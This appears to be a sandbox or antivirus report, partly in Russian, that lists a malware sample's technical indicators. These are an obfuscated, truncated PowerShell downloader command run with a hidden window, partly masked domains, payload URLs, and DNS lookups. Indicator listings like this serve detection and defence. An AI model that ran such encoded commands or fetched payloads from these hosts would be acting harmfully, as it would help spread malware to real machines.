Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAF8ANgAyADEANABfAF8APQAoACcAZAAnACsAJwAxADAAXwAnACsAJwAxADUAXwA5ACcAKQA7ACQAcwBfAF8AOAA1ADYAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAUwA3ADAAMAA0ADUAXwA9AC...
- 'ka####afloreria.com':80
- 'in###mjapan.com':80
- 'in###mjapan.com':443
- 'tr####rthtimber.com':80
- 'tr####rthtimber.com':443
- 'ka###tsa.org':80
- http://ka####afloreria.com/n0vpOjlS
- http://in###mjapan.com/h9XwHYQu
- http://tr####rthtimber.com/CSncj8f
- http://ka###tsa.org/ohCJotRf8F
- 'in###mjapan.com':443
- 'tr####rthtimber.com':443
- DNS ASK ka####afloreria.com
- DNS ASK in###mjapan.com
- DNS ASK fa####s.scketon.com
- DNS ASK tr####rthtimber.com
- DNS ASK ka###tsa.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAF8ANgAyADEANABfAF8APQAoACcAZAAnACsAJwAxADAAXwAnACsAJwAxADUAXwA5ACcAKQA7ACQAcwBfAF8AOAA1ADYAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAUwA3ADAAMAA0ADUAXwA9AC...' (со скрытым окном)